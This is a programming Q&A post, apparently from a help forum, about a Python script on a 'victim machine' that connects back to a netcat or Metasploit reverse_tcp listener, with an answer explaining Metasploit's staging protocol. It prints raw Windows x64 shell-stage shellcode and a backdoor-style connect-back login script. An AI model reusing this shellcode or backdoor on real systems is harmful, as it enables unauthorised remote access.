When I run my Python script and use netcat -nvlp 4444, the connection establishes fine and I am able to use the functions. When attempting to replicate this in Metasploit I use set payload windows/x64/shell/reverse_tcp, then I set the LHOST and LPORT, and run the script on the victim machine. The connection establishes, but right after receiving Login: on my end, I get the error below.
I did some research and I think some bytes should be excluded, such as the null ones, but I am unsure if this is the issue or the correct way to fix the issue. One thing I am confused by is why pwd receives anything if the script crashes before I have inputted the password.
When trying print(pwd) before decode:
b'P\x01\x00\x00' b'\xfcH\x83\xe4\xf0\xe8\xc0\x00\x00\x00AQAPRQVH1\xd2eH\x8bR`H\x8bR\x18H\x8bR H\x8brPH\x0f\xb7JJM1\xc9H1\xc0\xac<a|\x02, A\xc1\xc9\rA\x01\xc1\xe2\xedRAQH\x8bR \x8bB<H\x01\xd0\x8b\x80\x88\x00\x00\x00H\x85\xc0tgH\x01\xd0P\x8bH\x18D\x8b@ I\x01\xd0\xe3VH\xff\xc9A\x8b4\x88H\x01\xd6M1\xc9H1\xc0\xacA\xc1\xc9\rA\x01\xc18\xe0u\xf1L\x03L$\x08E9\xd1u\xd8XD\x8b@$I\x01\xd0fA\x8b\x0cHD\x8b@\x1cI\x01\xd0A\x8b\x04\x88H\x01\xd0AXAX^YZAXAYAZH\x83\xec AR\xff\xe0XAYZH\x8b\x12\xe9W\xff\xff\xff]I\xb8cmd\x00\x00\x00\x00\x00APAPH\x89\xe2WWWM1\xc0j\rYAP\xe2\xfcf\xc7D$T\x01\x01H\x8dD$\x18\xc6\x00hH\x89\xe6VPAPAPAPI\xff\xc0API\xff\xc8M\x89\xc1L\x89\xc1A\xbay\xcc?\x86\xff\xd5H1\xd2H\xff\xca\x8b\x0eA\xba\x08\x87\x1d`\xff\xd5\xbb\xf0\xb5\xa2VA\xba\xa6\x95\xbd\x9d\xff\xd5H\x83\xc4(<\x06|\n\x80\xfb\xe0u\x05\xbbG\x13roj\x00YA\x89\xda\xff\xd5'
errors:

```
Traceback (most recent call last):
  File "C:\Users\13472\Desktop\folder\testh\testv5\testmod3Copy3.py", line 87, in <module>
    Login()
  File "C:\Users\13472\Desktop\folder\testh\testv5\testmod3Copy3.py", line 37, in Login
    pwd = pwd.decode("utf-8").strip()
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte
```
code snippet:

```python
import socket

# host and port are assigned earlier in the script (not shown in the post)

passwd = "Anything"


def Login():
    global s
    while True:
        string1 = ("Login: ")
        string1 = string1.encode("utf-8")
        s.send(string1)
        pwd = s.recv(1024)
        # Whatever the peer sends back is decoded as UTF-8 text here; this is
        # the line the traceback points at.
        pwd = pwd.decode("utf-8")
        if pwd.strip() == passwd:
            break
        else:
            continue
    string2 = ("You are connected! ")
    string2 = string2.encode("utf-8")
    s.send(string2)


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
Login()
```
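The following is an added example, not the asker's script, that reproduces the decode failure offline using the two byte strings printed above (truncated to their first bytes; the full stage is not reproduced). It assumes the two printed values are two successive recv() results from the same loop. A staged Metasploit reverse_tcp handler does not speak a text protocol: on connect it sends a 4-byte little-endian stage length and then the stage itself, so the first recv() returns the header (which happens to be valid UTF-8 and therefore "receives something" without crashing, but is not the password), and the second returns the stage, whose first byte 0xfc is not a valid UTF-8 start byte. The check a text-based login loop needs before calling decode() is shown as as_text(); the function names here are hypothetical.

```python
import struct

# Constructed from the bytes in the post: the first recv() result in full and
# the first 20 bytes of the second one.
FIRST_RECV = b"P\x01\x00\x00"
SECOND_RECV = b"\xfcH\x83\xe4\xf0\xe8\xc0\x00\x00\x00AQAPRQVH1\xd2"


def as_text(data):
    """Return the UTF-8 text of `data`, or None if it is not valid UTF-8.

    This is the check the login loop lacks: decode() is only safe once it is
    known that the peer actually sent text.
    """
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None


def stage_length(header):
    """Interpret a 4-byte little-endian length prefix, the form a staged
    Metasploit reverse_tcp handler sends before the stage."""
    if len(header) != 4:
        raise ValueError("expected exactly 4 header bytes")
    return struct.unpack("<I", header)[0]


def classify_recv(data, expected_password):
    """Mimic one iteration of the login loop, reporting what happened instead
    of crashing."""
    text = as_text(data)
    if text is None:
        return "binary (decode would raise UnicodeDecodeError)"
    if text.strip() == expected_password:
        return "password accepted"
    return "text, wrong password: %r" % text


if __name__ == "__main__":
    print("first recv :", classify_recv(FIRST_RECV, "Anything"))
    print("stage length declared by header:", stage_length(FIRST_RECV))
    print("second recv:", classify_recv(SECOND_RECV, "Anything"))
```

Running it shows that the header decodes to the four-character string "P\x01\x00\x00" (so the loop simply sees a wrong password and sends "Login: " again), that the header declares a 336-byte stage, and that the stage bytes cannot be decoded at all. Excluding individual bytes would not help: the peer is a binary staging protocol, not a client typing a password, so the handler must either refuse non-text input or stop treating the connection as a text session.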